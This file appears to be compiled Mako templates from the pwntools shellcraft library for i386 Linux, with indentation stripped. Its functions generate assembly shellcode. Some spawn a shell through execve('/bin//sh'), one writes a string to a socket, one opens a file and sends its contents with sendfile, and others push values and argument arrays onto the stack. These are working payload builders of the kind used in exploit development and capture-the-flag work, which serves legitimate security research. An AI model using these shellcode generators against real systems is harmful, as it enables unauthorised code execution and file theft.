def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.constants.linux.i386 import SYS_execve
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['SYS_execve']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n\n')
__M_writer(unicode(i386.pushstr('/bin///sh')))
__M_writer(u'\n\n')
__M_writer(unicode(i386.linux.syscall('SYS_execve', 'esp', 0, 0)))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, string, sock='ebp', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
sock=sock,
string=string)
len = context.get('len', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.constants.linux.i386 import SYS_write
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['SYS_write']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
__M_writer(unicode(i386.pushstr(string, append_null=False)))
__M_writer(u'\n')
__M_writer(
unicode(i386.linux.syscall('SYS_write', sock, 'esp', len(string))))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, value, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, value=value)
int = context.get('int', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
repr = context.get('repr', UNDEFINED)
long = context.get('long', UNDEFINED)
__M_writer = context.writer()
from pwnlib.util import packing
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['packing']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
import re
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['re']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
if isinstance(value, (int, long)):
__M_writer(u' /* push ')
__M_writer(unicode(repr(value)))
__M_writer(u' */\n ')
__M_writer(
unicode(
re.sub(
r'^\s*/.*\n', '',
i386.pushstr(packing.pack(value, 32, 'little', True),
False), 1)))
__M_writer(u'\n')
else:
__M_writer(u' push ')
__M_writer(unicode(value))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, filename, fd=1, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
fd=fd,
filename=filename)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386', 'common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
label = common.label("sendfile_loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['label']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n ')
__M_writer(unicode(i386.pushstr(filename)))
__M_writer(u'\n ')
__M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
__M_writer(u'\n ')
__M_writer(
unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(
u"\n\n\n /* Clear eax, ecx, edx */\n xor eax, eax\n push eax\n\n /* Push '/bin//sh' */\n"
)
__M_writer(unicode(i386.pushstr("/bin//sh")))
__M_writer(
u'\n mov ecx, esp\n\n /* execve("/bin//sh", {junk, 0}, {0}); */\n push eax\n push esp\n push esp\n push ecx\n push eax\n mov al, SYS_execve\n int 0x80\n\n'
)
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, reg, array, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(array=array, reg=reg, pageargs=pageargs)
reversed = context.get('reversed', UNDEFINED)
repr = context.get('repr', UNDEFINED)
len = context.get('len', UNDEFINED)
str = context.get('str', UNDEFINED)
enumerate = context.get('enumerate', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
if isinstance(array, (str)):
array = [array]
array_str = ''
# Normalize all of the arguments' endings
array = [arg.rstrip('\x00') + '\x00' for arg in array]
array_str = ''.join(array)
word_size = 4
offset = len(array_str) + word_size
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
['word_size', 'array', 'offset', 'array_str', 'arg']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u' /* push argument array ')
__M_writer(unicode(repr(array)))
__M_writer(u' */\n ')
__M_writer(unicode(i386.pushstr(array_str)))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov(reg, 0)))
__M_writer(u'\n push ')
__M_writer(unicode(reg))
__M_writer(u' /* null terminate */\n')
for i, arg in enumerate(reversed(array)):
__M_writer(u' ')
__M_writer(
unicode(i386.mov(reg, offset + word_size * i - len(arg))))
__M_writer(u'\n add ')
__M_writer(unicode(reg))
__M_writer(u', esp\n push ')
__M_writer(unicode(reg))
__M_writer(u' /* ')
__M_writer(unicode(repr(arg)))
__M_writer(u' */\n ')
offset -= len(arg)
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['offset']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u' ')
__M_writer(unicode(i386.mov(reg, 'esp')))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context,path='/bin///sh',argv=0,envp=0,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(path=path,pageargs=pageargs,envp=envp,argv=argv)
dict = context.get('dict', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
list = context.get('list', UNDEFINED)
str = context.get('str', UNDEFINED)
tuple = context.get('tuple', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import i386, registers
from pwnlib.abi import linux_i386_syscall as abi
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['abi','i386','registers'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
if isinstance(envp, dict):
envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['k','envp','v'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if isinstance(argv, (list, tuple)):
__M_writer(u' ')
__M_writer(unicode(i386.pushstr_array(abi.register_arguments[3], argv)))
__M_writer(u'\n ')
argv = abi.register_arguments[3]
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['argv'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if isinstance(envp, (list, tuple)):
__M_writer(u' ')
__M_writer(unicode(i386.pushstr_array(abi.register_arguments[2], envp)))
__M_writer(u'\n ')
envp = abi.register_arguments[2]
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['envp'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if isinstance(path, str) and not registers.is_register(path):
__M_writer(u' ')
__M_writer(unicode(i386.pushstr(path)))
__M_writer(u'\n ')
path = 'esp'
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['path'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u' ')
__M_writer(unicode(i386.syscall('SYS_execve', path, argv, envp)))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()